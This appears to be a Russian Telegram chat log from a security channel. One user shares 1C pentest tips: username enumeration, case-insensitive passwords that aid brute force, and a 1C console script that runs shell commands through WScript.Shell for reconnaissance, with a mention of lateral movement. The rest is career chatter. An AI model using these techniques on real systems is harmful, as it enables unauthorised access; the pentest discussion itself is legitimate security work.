Size: a a a

2020 November 10

PK

Pavel Korostelev in CyberOff
кстати кроме шуток
источник

A

Alexey in CyberOff
Что нужно знать, при пентесте 1С

* Иногда там выдаются имена пользователей (если включено) в автодополнении, либо можно попробовать обратиться на /ru_RU/e1cib/users.
* Пароли из коробки не чувствительны к регистру. "Пароль" и "пАрОль" - одно и тоже, что уменьшает количество для брута (особенно классно вместе с предыдущим пунктом).
* Внутри часто есть выполнение произвольного кода.
источник

A

Alexey in CyberOff
В консоле же легко выполнять произвольные команды и выводить их с помощью функции "Сообщить".

Например:

СисИнфо = Новый СистемнаяИнформация;
Shell = Новый COMОбъект("WScript.Shell");
UserDir = Shell.ExpandEnvironmentStrings("%USERPROFILE%");
Сообщить(СисИнфо.ВерсияОС+" "+СисИнфо.ТипПлатформы+Символы.ПС+Символы.ПС+СисИнфо.Процессор+", RAM: "+СисИнфо.ОперативнаяПамять+" МБ"+Символы.ПС);
Сообщить("Каталог 1с: " + КаталогПрограммы());
Сообщить("Пользователь: "+UserDir);
Тасклист=Shell.Exec("tasklist /v");
Сообщить(Тасклист.StdOut.ReadAll());


Дальше уже можно загружать внешние сценарии, повышать привилегии (скорее всего уже будет админ) и распространяться по сети.
источник

A

Alexey in CyberOff
Uralan El
ну на изучение могут уйти годы. надо знать в той же степени , в которой опытные разрабы?
все так, в апсеки нужно крепо прогать. Некогда учится прогать, иди в десекоПСЫ
источник

A

Alexey in CyberOff
это тоже на хайпе и тм хватает скриптов на питоне
источник

A

Alexey in CyberOff
да и тема смежная, там недалеко до апсека настоящего.
источник

v

vpm in CyberOff
ViolentOr
Нет, в этой степени без шансов. Надо на уровне крепкого миддла
Зачем крепкому мидлу становиться апсеком?
источник

A

Alexey in CyberOff
Он будет секьюрити чемпионом )
источник

UE

Uralan El in CyberOff
пояс дадут?
источник

V

ViolentOr in CyberOff
vpm
Зачем крепкому мидлу становиться апсеком?
Если ему не интересно круды по кругу писать, например. Я знаю и сеньоров которые выкатывались из ит
источник

KN

Kirill Nazarov in CyberOff
Pavel Korostelev
кстати кроме шуток
Тема интересная, но я все никак не доберусь до освоения - последнее мое плотное общение с 1С было в 2012 году, когда я чуть было не ушел из этой вашей безопасности)
источник

V

ViolentOr in CyberOff
Uralan El
пояс дадут?
Шахида разве что
источник

v

vpm in CyberOff
ViolentOr
Если ему не интересно круды по кругу писать, например. Я знаю и сеньоров которые выкатывались из ит
Я про деньги больше, сомневаюсь просто
источник

V

ViolentOr in CyberOff
vpm
Я про деньги больше, сомневаюсь просто
Не все в деньгах измеряется)
источник

v

vpm in CyberOff
Kirill Nazarov
Тема интересная, но я все никак не доберусь до освоения - последнее мое плотное общение с 1С было в 2012 году, когда я чуть было не ушел из этой вашей безопасности)
Пусть горит в аду
источник

v

vpm in CyberOff
ViolentOr
Не все в деньгах измеряется)
Если выше определённой суммы то да
источник

V

ViolentOr in CyberOff
vpm
Если выше определённой суммы то да
И у каждого эта определенная сумма своя)
источник

v

vpm in CyberOff
Я хочу Бентли)))
источник

1G

12 Gramm in CyberOff
Начинаешь изучать питон или джаву, втягиваешься и забываешь секьюрити как страшный сон.
источник

v

vpm in CyberOff
ViolentOr
И у каждого эта определенная сумма своя)
Согласен
источник